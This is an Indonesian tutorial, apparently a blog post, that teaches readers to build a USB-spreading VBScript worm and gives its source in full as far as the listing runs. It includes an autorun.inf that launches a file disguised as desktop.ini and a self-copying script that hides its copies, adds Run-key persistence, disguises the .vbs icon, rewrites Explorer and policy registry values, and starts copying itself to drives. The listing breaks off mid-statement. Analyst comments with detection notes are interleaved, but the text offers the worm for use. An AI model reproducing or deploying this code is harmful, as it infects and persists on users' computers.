Sama seperti pembahasan sebelumnya, mari kita buat virus kembali, dari script virus cabulxx yang sedikit dimodifikasi. Tahap pertama membuat virus adalah kita harus memiliki autorun. Di bawah ini script autorunnya:
script begin
----------------------
; Analyst notes (defensive reading of this autorun.inf):
; - Both launch entries below start wscript.exe with the VBScript engine forced
;   (//e:VBScript) on a file named dasktop.ini, so the ".ini" extension does not
;   stop it from being run as a script. A command line pairing wscript.exe,
;   //e:VBScript and a non-.vbs file name is a strong detection signal.
; - The file name dasktop.ini is a lookalike of the legitimate desktop.ini.
; - Mitigation: keep AutoRun disabled for removable and fixed drives
;   (NoDriveTypeAutoRun policy) so the entries in this file are not honoured.
[autorun]
; Entry that launches the script through the drive's AutoRun handler.
shellexecute=wscript.exe //e:VBScript dasktop.ini auto
; Text shown to the user for this entry; it reads like an ordinary "open folder" choice.
action=Open folder to view file
; Rebinds the drive's "open" verb to the same script launch.
shell\open\command=wscript.exe //e:VBScript dasktop.ini auto
; Drive icon taken from shell32.dll, index 4 (presumably a folder icon, to match the action text - confirm).
icon=%systemroot%\shell32.dll,4
File di atas berfungsi sebagai autorun. Nama dasktop.ini adalah samaran dari file asli Windows, desktop.ini. Copy paste teks di atas, lalu save as dengan tipe All Files sebagai autorun.inf.
Nah, di bawah ini script desktop.ini palsu (dasktop.ini):
script begin
----------------------
' Analyst notes (defensive reading of this listing; the listing is truncated on the page).
' Behaviour visible below: the script reads its own text, writes copies of itself under
' the Windows folder and My Documents, registers two HKCU Run values, rewrites the .vbs
' file icon, writes several Explorer/policy registry values, and starts walking
' removable and fixed drives.
' Artefacts to hunt for (all taken from the code below):
'   files    : <WindowsFolder>\myName.bat, <WindowsFolder>\winsoc.vbs,
'              <MyDocuments>\dian sastrowardoyo\midori.vbs, <MyDocuments>\diansastro.vbs,
'              <drive root>\dasktop.ini
'   registry : HKCU\Software\Microsoft\Windows\CurrentVersion\Run\winsoc
'              HKCU\Software\Microsoft\Windows\CurrentVersion\Run\xGentn4m3
'              HKCR\VBSFile\DefaultIcon (default value pointing at wmplayer.exe,1)
' Detection idea: wscript.exe/cscript.exe writing to Run keys or to the Policies\System
' and Policies\Explorer values listed further down.

' Every runtime error is ignored from here on, so failed file or registry operations are silent.
on error resume next
set fs=createobject("scripting.filesystemobject")
' Handle to the script file that is currently running.
set b3b15cR17T=fs.getfile(wscript.scriptfullname)
' In-memory copy of the autorun.inf text (same five lines as the autorun.inf on this page).
' It is not used in the part of the listing that is visible.
b3b15cR17Trn="[autorun]"&vbcrlf&"shellexecute=wscript.exe //e:VBScript dasktop.ini auto"&vbcrlf&"action=Open folder to view file"&vbcrlf&"shell\open\command=wscript.exe //e:VBScript dasktop.ini auto"&vbcrlf&"icon=%systemroot%\shell32.dll,4"
' Open the running script for reading (1 = ForReading, -2 = system default encoding)
' and accumulate its full text, line by line, in b3b15cR17Tv.
set b3b15cR17Ttx=b3b15cR17T.openastextstream(1,-2)
do while not b3b15cR17Ttx.atendofstream
b3b15cR17Tv=b3b15cR17Tv&b3b15cR17Ttx.readline
b3b15cR17Tv=b3b15cR17Tv&vbcrlf
loop
' Opens a loop; its closing "loop" is not within the visible part of the listing.
do
' GetSpecialFolder(0) is the Windows folder.
set b3b15cR17Th=fs.getspecialfolder(0)
' Reset attributes of an existing myName.bat to 32 (Archive only) before it is re-created.
set b3b15cR17Tfn=fs.getfile(b3b15cR17Th &"\myName.bat")
b3b15cR17Tfn.attributes=32
' (Re)create <WindowsFolder>\myName.bat: a batch file that prints a banner and pauses.
set my63615cR1p7=fs.createtextfile(b3b15cR17Th &"\myName.bat")
my63615cR1p7.writeline "@echo off"
my63615cR1p7.writeline "echo ######### ## ## ## ##### ### ########### ########"
my63615cR1p7.writeline "echo ############ ## ### #### ####### #### ######## ##########"
my63615cR1p7.writeline "echo ## ### ## ## ##### #### # ##"
my63615cR1p7.writeline "echo ## ## ## ## ###### #### # ##"
my63615cR1p7.writeline "echo ### ### ## ## ## ###### #### ## # ##"
my63615cR1p7.writeline "echo ## ## ## #### ######## #### ## ## ### ####"
my63615cR1p7.writeline "echo ## ## ######### #### ## ## ## # ##"
my63615cR1p7.writeline "echo ## ## ## #### ######## #### ####### # ##"
my63615cR1p7.writeline "echo ### ### ## ###### ## #### ### ## # ##"
my63615cR1p7.writeline "echo ## ## ## #### ## ## # ##"
my63615cR1p7.writeline "echo ## ## ## #### ## # ####"
my63615cR1p7.writeline "echo ############ ########## #### #### ####"
my63615cR1p7.writeline "echo ######### ####### ### ########"
my63615cR1p7.writeline "maafkan aku mencintaimu [verion: 21-09-2009]"
my63615cR1p7.writeline "pause"
my63615cR1p7.close
' Attributes 39 = ReadOnly(1) + Hidden(2) + System(4) + Archive(32): the file is hidden
' from a default Explorer view once written.
set b3b15cR17Tfn=fs.getfile(b3b15cR17Th &"\myName.bat")
b3b15cR17Tfn.attributes=39
' Resolve the current user's My Documents folder and make sure the sub-folder
' "dian sastrowardoyo" exists there.
set DB5cR1p7x93nT=createobject("WScript.Shell")
docf=DB5cR1p7x93nT.specialfolders("MyDocuments")
sCr1p7x93nT3v1L=docf & "\dian sastrowardoyo"
if not fs.folderexists(sCr1p7x93nT3v1L) then
set crfolder=fs.createfolder(sCr1p7x93nT3v1L)
end if
' Copy of the script text written as midori.vbs inside that folder.
set b3b15cR17Tfn=fs.createtextfile(sCr1p7x93nT3v1L & "\midori.vbs")
b3b15cR17Tfn.write b3b15cR17Tv
b3b15cR17Tfn.close
set DB5cR1p7x93nT = createobject("WScript.Shell")
' Persistence: two per-user Run values, so the listed paths are started at logon.
DB5cR1p7x93nT.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\winsoc","c:\Windows\winsoc.vbs","REG_SZ"
DB5cR1p7x93nT.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\xGentn4m3","c:\Windows\myName.bat","REG_SZ"
' Masquerading: the icon shown for VBSFile (.vbs) is replaced with one from wmplayer.exe.
DB5cR1p7x93nT.regwrite "HKEY_CLASSES_ROOT\VBSFile\DefaultIcon\","C:\Program Files\Windows Media Player\wmplayer.exe,1","REG_SZ"
' The block below writes per-user policy and Explorer values (command prompt, Task Manager,
' MsConfig, registry tools, hidden-file display, Run dialog, Folder Options).
' Only the writes themselves are stated here; any write to these values by a script host
' is worth alerting on, whatever data is written.
almreg = "HKCU\Software\Policies\Microsoft\Windows\System\"
DB5cR1p7x93nT.RegWrite almreg & "DisableCMD","0", "REG_DWORD"
almreg = "HKCU\Software\Microsoft\Windows\CurrentVersion\"
DB5cR1p7x93nT.RegWrite almreg & "Policies\System\DisableTaskMgr","0","REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "Policies\System\DisableMsConfig","0","REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "Policies\System\DisableRegistryToo0s","0","REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "Explorer\Advanced\Hidden","0","REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "Explorer\Advanced\HideFileExt","0","REG_DWORD"
DB5cR1p7x93nT.Regwrite almreg & "Explorer\Advanced\ShowSuperHidden","0x00000001"
almreg = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\"
DB5cR1p7x93nT.RegWrite almreg & "NoRun", "0", "REG_DWORD"
DB5cR1p7x93nT.RegWrite almreg & "NoFolderOptions", "0", "REG_DWORD"
' Same reset / rewrite / hide sequence as for myName.bat, this time for
' <WindowsFolder>\winsoc.vbs, which receives a copy of the script text.
set b3b15cR17Th=fs.getspecialfolder(0)
set b3b15cR17Tfn=fs.getfile(b3b15cR17Th &"\winsoc.vbs")
b3b15cR17Tfn.attributes=32
set b3b15cR17Tfn=fs.createtextfile(b3b15cR17Th &"\winsoc.vbs")
b3b15cR17Tfn.write b3b15cR17Tv
b3b15cR17Tfn.close
set b3b15cR17Tfn=fs.getfile(b3b15cR17Th &"\winsoc.vbs")
b3b15cR17Tfn.attributes=39
' Another copy of the script text, written as diansastro.vbs directly in My Documents.
set b3b15cR17Twsl=createobject("wscript.shell")
b3b15cR17Tdc=b3b15cR17Twsl.specialfolders("MyDocuments")
set b3b15cR17Tfn=fs.createtextfile(b3b15cR17Tdc &"\diansastro.vbs")
b3b15cR17Tfn.write b3b15cR17Tv
b3b15cR17Tfn.close
' Walk every drive; DriveType 1 = removable, 2 = fixed, and A: is skipped.
' For each match the script touches <drive root>\dasktop.ini, the file name that the
' autorun.inf on this page launches.
for each b3b15cR17Tdrive in fs.drives
if (b3b15cR17Tdrive.drivetype=1 or b3b15cR17Tdrive.drivetype=2) and b3b15cR17Tdrive.path<>"A:" then
set b3b15cR17Tfn=fs.getfile(b3b15cR17Tdrive.path &"\dasktop.ini")
b3b15cR17Tfn.attributes=32
' NOTE(review): the listing is cut off mid-statement on the page; the rest of this loop
' body and the closing statements are not shown.
set b3b15cR17Tfn=fs.cre